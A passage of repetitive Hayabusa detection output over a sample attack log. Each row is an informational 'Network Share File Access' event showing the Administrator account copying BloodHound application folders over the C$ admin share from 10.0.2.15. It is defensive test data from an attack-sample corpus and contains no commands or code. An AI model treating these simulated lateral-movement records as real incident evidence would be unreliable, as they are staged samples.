+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
